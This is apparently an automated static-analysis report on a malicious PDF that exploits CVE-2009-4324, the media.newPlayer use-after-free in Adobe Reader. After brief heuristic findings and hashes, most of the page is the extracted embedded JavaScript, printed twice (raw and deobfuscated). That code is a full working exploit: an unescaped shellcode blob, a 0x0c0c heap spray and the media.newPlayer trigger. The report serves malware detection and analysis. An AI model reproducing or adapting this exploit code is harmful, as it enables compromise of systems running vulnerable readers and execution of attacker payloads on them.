Malicious PDF — malware analysis report

Static analysis result for SHA-256 e07ff198e39335c1…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2026-05-11
MD5: e61422a5f59c750f9904fd3baf7a52f2 SHA-1: e80a8cede1116a5bf6e6f7ef8c87dea6995ac513 SHA-256: e07ff198e39335c1b60a1ab09dbef35bf17b7fd2471300e67d84828da3997a4e
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript stream, named 'javascript_obj0031_000.js', is likely responsible for the malicious behavior. While the exact actions of the script are not fully detailed, its presence within a suspicious PDF strongly suggests it's designed to download and execute a second-stage payload or perform other malicious actions.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 2041 bytes
SHA-256: a6d0585170a841c5849588fd4636792246e419fa4aea0683aa4a831c8dab0139
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 4833 bytes
SHA-256: 67d16badf36b4d8c67c0c47adb9f01a2eaa60fa09fbb30364a16791a02d36c18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 40 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV=unescape;
var IKksdghdfda="dfodjffFFhsdeEEgsdnnvnVCOpUJH";
var UJNyhbTGVrfc =  PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x75\x61\x31\x36\x34\x25\x75\x30\x30\x33\x30\x25\x750000\x25\x750005\x25\x750004\x25\x758b00\x25\x75ebf8\x25\x755e14%udf8b%uc8b9%u0000%ufc00%u35ad%uefef%uefef"+
"%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%uac06%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f"+
"%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364"+
"%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a%uf7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10"+
"%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4"+
"%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87"+
"%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u5d06%u4328%u2cdd"+
"%u2ddd%u1145%u1124%u0d25%u851b%u62ef%u8faa%u10bf%ub39a%uba64%ubdd3%u9a10%u10a3%uf3ba%uba64"+
"%uc68f%ub7ba%u926c%uefb7%u5d90%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0"+
"%u6525%ua0b4%u28ec%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511"+
"%u03e1%uec78%uefe3%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef"+
"%uefef%uefef%uefef%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef"+
"%u9bef%u828a%uc19f%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u4307%u1011%u6410%u643f"+
"%u641a%u6411%u6c21%udf2e%u4007%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10"+
"%ud2cb%u54ef%ueffd%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf"+
"%uef10%uefef%uba10%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85"+
"%uef87%ueff0%u10ef%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7"+
"%u85ef%u87ef%uf0ff%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87"+
"%uefef%u62af%u87aa%u6cbf%ufbaa%u04ea%u64e5%u641a%uba10%u0364%u8910%u07fb%u101e%u1010%u6cb2"+
"%u1017%ued9a%ud604%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ua507"+
"%u1011%uba10%u26dc%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e"+
"%u1010%u85b2%u85ef%u1010%uebba%u7f7f%uba7f%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013"+
"%ue79a%ua307%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef"+
"%uaa64%u2617%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64"+
"%u2ee3%uff0f%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa"+
"%ubf62%u64ec%u6cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f"+
"%uefef%ue99a%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf"+
"%u10ef%uefca%uafcf");
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858\x25\x756371%u717a%u7672%u626e%u626e\x25\x75455a%u4243%u6764%u7646\x25\x75696b%u6a6e%u4e61%u6c6d\x25\x757350\x25\x755168\x25\x757171\x25\x755574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 33500) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,33500 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
var OIYTfcdeERHnbCDSetjjkk="ETmnsdbfDSXvnkfkjhbDSsdFBb";
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x1000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}
var EYIjndbsfedfSDWvbsdbndjAkvp=util;
EYIjndbsfedfSDWvbsdbndjAkvp.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
EYIjndbsfedfSDWvbsdbndjAkvp.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
var fduiJgDRRecVJkopOiytFGH=this;
try {fduiJgDRRecVJkopOiytFGH.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
var QETYuijjGDSXcvBJIIOutfWQAsDFFGg=util;
QETYuijjGDSXcvBJIIOutfWQAsDFFGg.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
var WSXDREDcgtYHBNMNujiKEtyhfdVBNMNikJGResd="QRSFXCHVjhbKnGUFvhBmbKLJOLJNnFREdcsaXBJHIOiofd";
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 4631 bytes
SHA-256: 12472f8407165c40f4a229cea7b6f3a14affe4fcf487bfa659e6688aaca9b083
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 34 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV=unescape;
var IKksdghdfda="dfodjffFFhsdeEEgsdnnvnVCOpUJH";
var UJNyhbTGVrfc =  PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("%ua164%u0030%u0000%u0005%u0004%u8b00%uebf8%u5e14%udf8b%uc8b9%u0000%ufc00%u35ad%uefef%uefef%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%uac06%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a%uf7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u5d06%u4328%u2cdd%u2ddd%u1145%u1124%u0d25%u851b%u62ef%u8faa%u10bf%ub39a%uba64%ubdd3%u9a10%u10a3%uf3ba%uba64%uc68f%ub7ba%u926c%uefb7%u5d90%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0%u6525%ua0b4%u28ec%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511%u03e1%uec78%uefe3%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u9bef%u828a%uc19f%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u4307%u1011%u6410%u643f%u641a%u6411%u6c21%udf2e%u4007%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10%ud2cb%u54ef%ueffd%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf%uef10%uefef%uba10%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85"+
"%uef87%ueff0%u10ef%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7%u85ef%u87ef%uf0ff%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87%uefef%u62af%u87aa%u6cbf%ufbaa%u04ea%u64e5%u641a%uba10%u0364%u8910%u07fb%u101e%u1010%u6cb2%u1017%ued9a%ud604%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ua507%u1011%uba10%u26dc%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e%u1010%u85b2%u85ef%u1010%uebba%u7f7f%uba7f%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013%ue79a%ua307%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef%uaa64%u2617%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64%u2ee3%uff0f%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa%ubf62%u64ec%u6cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f%uefef%ue99a%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf%u10ef%uefca%uafcf");
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858\x25\x756371%u717a%u7672%u626e%u626e\x25\x75455a%u4243%u6764%u7646\x25\x75696b%u6a6e%u4e61%u6c6d\x25\x757350\x25\x755168\x25\x757171\x25\x755574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 33500) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,33500 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
var OIYTfcdeERHnbCDSetjjkk="ETmnsdbfDSXvnkfkjhbDSsdFBb";
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x1000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}
var EYIjndbsfedfSDWvbsdbndjAkvp=util;
EYIjndbsfedfSDWvbsdbndjAkvp.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
EYIjndbsfedfSDWvbsdbndjAkvp.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
var fduiJgDRRecVJkopOiytFGH=this;
try {fduiJgDRRecVJkopOiytFGH.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
var QETYuijjGDSXcvBJIIOutfWQAsDFFGg=util;
QETYuijjGDSXcvBJIIOutfWQAsDFFGg.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
var WSXDREDcgtYHBNMNujiKEtyhfdVBNMNikJGResd="QRSFXCHVjhbKnGUFvhBmbKLJOLJNnFREdcsaXBJHIOiofd";

Open this report in the interactive analyzer, or submit your own file for analysis.